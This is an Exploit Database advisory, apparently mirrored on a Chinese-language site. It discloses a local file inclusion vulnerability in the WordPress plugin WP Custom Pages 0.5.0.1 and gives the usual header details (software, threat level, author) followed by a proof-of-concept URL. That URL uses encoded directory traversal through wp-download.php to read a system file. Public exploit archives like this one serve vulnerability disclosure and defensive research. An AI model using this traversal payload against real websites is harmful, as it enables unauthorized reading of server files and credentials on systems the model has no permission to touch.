WordPress Plugin Custom Pages 0.5.0.1 – Local File Inclusion

• Exploit Database
• 18 阅读

• 作者： AutoSec Tools
  日期： 2011-04-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17119/

• ------------------------------------------------------------------------
  Software................WordPress WP Custom Pages 0.5.0.1
  Vulnerability...........Local File Inclusion
  Threat Level............Critical (4/5)
  Download................http://wordpress.org/extend/plugins/wp-custom-pages/
  Discovery Date..........4/3/2011
  Tested On...............Windows Vista + XAMPP
  ------------------------------------------------------------------------
  Author..................AutoSec Tools
  Site....................http://www.autosectools.com/
  Email...................John Leitch <john@autosectools.com>
  ------------------------------------------------------------------------
  
  
  --PoC--
  
  http://localhost/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini